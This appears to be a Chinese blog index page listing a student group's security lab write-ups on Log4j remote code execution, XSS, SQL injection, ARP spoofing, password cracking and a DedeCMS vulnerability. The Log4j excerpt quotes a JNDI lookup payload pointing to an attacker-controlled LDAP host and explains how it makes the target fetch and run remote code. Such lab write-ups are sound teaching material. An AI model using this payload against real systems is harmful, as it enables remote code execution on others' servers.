- 博客(8)
- 收藏
- 关注
RSS订阅原创 Apache log4j远程代码执行漏洞复现
Apache log4j远程代码执行漏洞复现(1) 漏洞原理:(2) 漏洞复现环境:(3) 漏洞复现过程:(1) 漏洞原理:Apache Log4j2 中存在JNDI注入漏洞,当程序将用户输入的数据进行日志记录时,即当log4j打印的日志内容中包含${jndi:ldap://my-ip}时,lookup会将jndi注入可执行语句执行,程序会通过ldap协议访问my-ip这个地址,然后my-ip就会返回一个包含java代码的class文件的地址,然后程序再通过返回的地址下载class文件并执行,从而达成漏
2022-05-11 22:50:39
1715
原创 脚踏实地小组的实验三
目录实验目的系统环境网络环境实验工具实验步骤XSS部分:利用Beef劫持被攻击者客户端浏览器SQL注入部分:DVWA+SQLmap+Mysql注入实战实验目的了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。系统环境Kali Linux 2、Windows Server网络环境交换网络结构实验工具Beef;AWVS(Acunetix Web Vu
2020-11-29 16:44:31
259
原创 脚踏实地小组的实验二
目录:前言实验目的:系统环境:网络环境:实验工具:一、网络嗅探网络嗅探:Wireshark 监听网络流量,抓包。ARP欺骗:ArpSpoof,实施ARP欺骗。FTP数据还原二、网站密码破解MD5破解John the Ripper的作用总结前言实验目的:1、通过使用Wireshark软件掌握Sniffer(嗅探器)工具的使用方法,实现捕捉HTTP等协议的数据包,以理解TCP/IP协议中多种协议的数据结构、通过实验了解HTTP等协议明文传输的特性。2、研究交换环境下的网络嗅探实现及防范方法,研究并利用A
2020-11-24 09:45:12
170
原创 脚踏实地小组的实验一
脚踏实地小组的 实验一实验目的:理解网络扫描、网络侦查的作用;通过搭建网络渗透测试平台,了解并熟悉常用的搜索引擎、扫描工具的应用,通过信息收集为下一步渗透工作打下基础。系统环境Kali Linux 2、Windows网络环境交换网络结构实验工具Metasploitable2(需自行下载虚拟机镜像);Nmap(Kali);WinHex、数据恢复软件等一、被动扫描1.用搜索引擎Google或百度搜索麻省理工学院网站中文包括“network security”的pdf文档2.照片信息搜
2020-11-06 20:49:28
1169
5
原创 脚踏实地小组的漏洞复现报告
脚踏实地小组的漏洞复现报告一、概述1.1项目背景织梦内容管理系统(DedeCms) 以简单、实用、开源而闻名,是国内最知名的 PHP 开源网站管理系统,也是使用用户最多的 PHP 类 CMS 系统,在经历多年的发展,目前的版本无论在功能,还是在易用性方面,都有了长足的发展和进步,DedeCms 免费版的主要目标用户锁定在个人站长,功能更专注于个人网站或中小型门户的构建,当然也不乏有企业用户和学校等在使用该系统。 2018 年 1 月 10 日,锦行信息安全公众号公开了一个关于 DeDeCMS前台任意用
2020-11-04 15:23:00
334
原创 脚踏实地小组的抓包实验
脚踏实地小组的抓包实验使用工具的介绍Wireshark 是一个网络封包分析软件。网络封包分析软件的功能是撷取网络封包,并尽可能显示出最为详细的网络封包资料。Wireshark使用WinPCAP作为接口,直接与网卡进行数据报文交换。在本次实验中我们使用 Wireshark 对图片以及聊天记录进行位置分析。实验操作(1)抓获图片的位置(2)抓获聊天记录的位置我们在使用 Wireshark 抓包时没能准确的抓获图片的具体位置,不过我们通过自己的方式进行了位置分析,并准确的找到了该图片中所展现的地点。
2020-11-02 14:31:32
191
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人